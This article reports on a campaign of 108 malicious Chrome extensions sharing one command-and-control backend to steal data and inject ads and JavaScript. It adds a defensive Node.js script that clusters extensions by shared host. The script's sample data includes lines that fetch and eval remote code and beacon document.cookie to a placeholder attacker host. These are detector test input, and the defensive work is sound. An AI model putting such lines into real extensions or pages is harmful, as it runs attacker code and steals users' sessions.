What happens when one malicious actor hides inside 108 different browser extensions that all report to a single command-and-control system? According to cybersecurity researchers, the answer is a campaign that can quietly harvest user data and turn every web page a victim visits into a vector for ad injection and arbitrary JavaScript, and reports put the number of users already affected at around 20,000.
The discovery
Cybersecurity researchers have discovered a new campaign in which a cluster of 108 Google Chrome extensions communicates with the same command-and-control (C2) infrastructure. According to Socket, the extensions share that C2 connection and are built to collect user data and abuse the browser by injecting ads and arbitrary JavaScript into every web page the user visits.
Scope and technique
The researchers describe the operation as coordinated: a large number of extensions behaving as one, controlled by a single backend. The campaign has been reported to steal Google and Telegram data and to affect roughly 20,000 users, turning ostensibly benign browser add-ons into tools for data collection and page-level manipulation.
Why this matters
At a technical level, the combination of wide distribution (many extensions), a single C2, and the ability to inject arbitrary JavaScript into every page means an adversary can both collect account data exposed in the browser (the reporting names Google and Telegram data) and alter the user's browsing session in real time, since injected script runs in the page with the user's own logged-in session. For users, that translates into unwanted ads, altered page content, and the theft of account-related data. For browser-extension ecosystems, the pattern shows how individually small components can be weaponized at scale when they share backend infrastructure: each extension looks harmless on its own, and the malicious behaviour only becomes visible when the shared backend is identified.
Perspectives and trade-offs
- Technologists: The campaign highlights the difficulty of detecting malicious behavior that is distributed across many small, innocuously named extensions yet unified by common command-and-control infrastructure.
- Policymakers: The emergence of large, coordinated extension campaigns raises questions about vetting, monitoring and enforcement in browser extension marketplaces.
- Users: The incident underscores risks associated with browser extensions broadly — even widely trusted platforms can be exploited when extensions are co-opted to perform harmful actions.
- Adversaries: The model — many front-facing components controlled by a single backend — is attractive because it spreads risk and complicates takedown and attribution efforts.
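As an added example, not code from the original reporting, from Socket, or from the extensions themselves, the following Node.js script shows one way a defender could surface the pattern described under "Why this matters" and in the Technologists bullet above: extensions that each look small and innocuous, but run content scripts on every page and reference the same backend host. The extension data, ids, and hostnames are constructed placeholders; nothing in it is the campaign's actual infrastructure, and the remote-code check is a heuristic, not proof of malice.

```javascript
// Added example (not from the reporting or from Socket): cluster unpacked
// Chrome extensions by the remote hosts their code references, and flag
// clusters whose members all run content scripts on every page.
// All extension data and hostnames below are constructed placeholders.

const BROAD_MATCHES = new Set(["<all_urls>", "*://*/*", "http://*/*", "https://*/*"]);

// Pull every http(s) host referenced in a source file.
function extractHosts(text) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(text)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// True when any declared content script matches every page.
function runsOnAllPages(manifest) {
  return (manifest.content_scripts || []).some((cs) =>
    (cs.matches || []).some((pat) => BROAD_MATCHES.has(pat)));
}

// Heuristic for remote code loading: eval / new Function, or a <script>
// element created at runtime (typically pointed at a remote URL).
function loadsRemoteCode(sources) {
  const pat = /\beval\b|\bnew\s+Function\b|createElement\(\s*["']script["']\s*\)/;
  return Object.values(sources).some((src) => pat.test(src));
}

// host -> sorted list of extension ids whose sources reference that host.
function clusterByHost(extensions) {
  const byHost = new Map();
  for (const ext of extensions) {
    const hosts = new Set();
    for (const src of Object.values(ext.sources)) extractHosts(src).forEach((h) => hosts.add(h));
    for (const h of hosts) {
      if (!byHost.has(h)) byHost.set(h, []);
      byHost.get(h).push(ext.id);
    }
  }
  for (const ids of byHost.values()) ids.sort();
  return byHost;
}

// Report hosts shared by at least `minShared` extensions that all run on
// every page: "many front ends, one backend", the shape the article describes.
function triage(extensions, minShared = 2) {
  const byId = new Map(extensions.map((e) => [e.id, e]));
  const findings = [];
  for (const [host, ids] of clusterByHost(extensions)) {
    const broad = ids.filter((id) => runsOnAllPages(byId.get(id).manifest));
    if (broad.length < minShared) continue;
    findings.push({
      host,
      extensions: broad,
      remoteCode: broad.filter((id) => loadsRemoteCode(byId.get(id).sources)),
    });
  }
  return findings.sort((a, b) => b.extensions.length - a.extensions.length);
}

// Constructed sample input: four unpacked extensions (id, manifest, sources).
// Three reference one placeholder backend; the fourth is a benign-looking
// site-specific extension with its own API host.
const SAMPLE_EXTENSIONS = [
  {
    id: "color-picker",
    manifest: { content_scripts: [{ matches: ["<all_urls>"], js: ["cs.js"] }], permissions: ["storage", "cookies"] },
    sources: { "cs.js": 'fetch("https://cfg.c2-placeholder.example/p").then(r => r.text()).then(eval);' },
  },
  {
    id: "tab-notes",
    manifest: { content_scripts: [{ matches: ["https://*/*", "http://*/*"], js: ["inject.js"] }] },
    sources: { "inject.js": 'const s = document.createElement("script"); s.src = "https://cfg.c2-placeholder.example/ads.js"; document.head.appendChild(s);' },
  },
  {
    id: "pdf-helper",
    manifest: { content_scripts: [{ matches: ["*://*/*"], js: ["main.js"] }] },
    sources: { "main.js": 'navigator.sendBeacon("https://cfg.c2-placeholder.example/t", document.cookie);' },
  },
  {
    id: "weather-now",
    manifest: { content_scripts: [{ matches: ["https://weather-placeholder.example/*"], js: ["w.js"] }] },
    sources: { "w.js": 'fetch("https://api.weather-placeholder.example/v1/now");' },
  },
];

function main() {
  for (const f of triage(SAMPLE_EXTENSIONS)) {
    console.log(`${f.host}: ${f.extensions.length} extensions on every page`, f.extensions,
      `loading remote code: ${f.remoteCode.join(", ") || "none"}`);
  }
}
main();
```

On real data the input would come from walking each unpacked extension directory (manifest.json plus every .js file), and the host clustering is the part that generalises: a single extension with `<all_urls>` is common and benign, but a dozen unrelated-looking extensions that all resolve to the same host is the signal worth escalating. Beaconing without `eval` (the `pdf-helper` case) is deliberately still flagged by the cluster even though the remote-code heuristic misses it.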
The contours of this campaign are clear in the reporting: many extensions, one C2, the ability to siphon data and to manipulate pages in real time. The remaining questions are how long the activity went unnoticed, how the extensions were distributed, and what remediation steps will be effective, and those are the ones defenders and platform operators now must answer. If more than a hundred innocuous-looking browser add-ons can be marshaled into a single data-harvesting engine, what other everyday software components might be repurposed next?
https://thehackernews.com/2026/04/108-malicious-chrome-extensions-steal.html